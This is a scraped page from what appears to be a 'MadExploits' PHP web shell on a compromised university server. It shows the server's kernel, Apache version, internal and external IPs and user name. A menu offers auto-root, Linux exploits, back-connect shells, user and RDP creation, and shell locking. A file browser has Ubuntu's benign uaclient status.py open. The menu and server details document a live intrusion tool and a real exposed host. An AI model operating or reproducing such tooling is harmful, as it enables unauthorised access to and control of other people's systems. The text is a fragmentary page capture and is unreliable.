Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.137.218.111
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
uaclient /
cli /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
9.16
KB
-rw-r--r--
api.py
2.37
KB
-rw-r--r--
attach.py
5.48
KB
-rw-r--r--
auto_attach.py
958
B
-rw-r--r--
cli_util.py
5.93
KB
-rw-r--r--
collect_logs.py
1.3
KB
-rw-r--r--
commands.py
3.68
KB
-rw-r--r--
config.py
9.9
KB
-rw-r--r--
detach.py
3.38
KB
-rw-r--r--
disable.py
10.62
KB
-rw-r--r--
enable.py
17.02
KB
-rw-r--r--
fix.py
28.7
KB
-rw-r--r--
help.py
1.67
KB
-rw-r--r--
parser.py
2.64
KB
-rw-r--r--
refresh.py
2.42
KB
-rw-r--r--
security_status.py
2.79
KB
-rw-r--r--
status.py
2.37
KB
-rw-r--r--
system.py
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : status.py
import time from uaclient import actions, config, event_logger, messages, status, util from uaclient.cli.commands import ProArgument, ProArgumentGroup, ProCommand from uaclient.cli.parser import HelpCategory event = event_logger.get_event_logger() def action_status(args, *, cfg: config.UAConfig, **kwargs): if not cfg: cfg = config.UAConfig() show_all = args.all if args else False token = args.simulate_with_token if args else None active_value = status.UserFacingConfigStatus.ACTIVE.value status_dict, ret = actions.status( cfg, simulate_with_token=token, show_all=show_all ) config_active = bool(status_dict["execution_status"] == active_value) if args and args.wait and config_active: while status_dict["execution_status"] == active_value: event.info(".", end="") time.sleep(1) status_dict, ret = actions.status( cfg, simulate_with_token=token, show_all=show_all, ) event.info("") event.set_output_content(status_dict) output = status.format_tabular(status_dict, show_all=show_all) event.info(util.handle_unicode_characters(output)) event.process_events() return ret status_command = ProCommand( "status", help=messages.CLI_ROOT_STATUS, description=messages.CLI_STATUS_DESC, action=action_status, preserve_description=True, help_category=HelpCategory.QUICKSTART, help_position=1, argument_groups=[ ProArgumentGroup( arguments=[ ProArgument( "--wait", help=messages.CLI_STATUS_WAIT, action="store_true", ), ProArgument( "--format", help=messages.CLI_FORMAT_DESC.format(default="tabular"), action="store", choices=["tabular", "json", "yaml"], default="tabular", ), ProArgument( "--simulate-with-token", help=messages.CLI_STATUS_SIMULATE_WITH_TOKEN, metavar="TOKEN", action="store", ), ProArgument( "--all", help=messages.CLI_STATUS_ALL, action="store_true" ), ] ) ], )
Close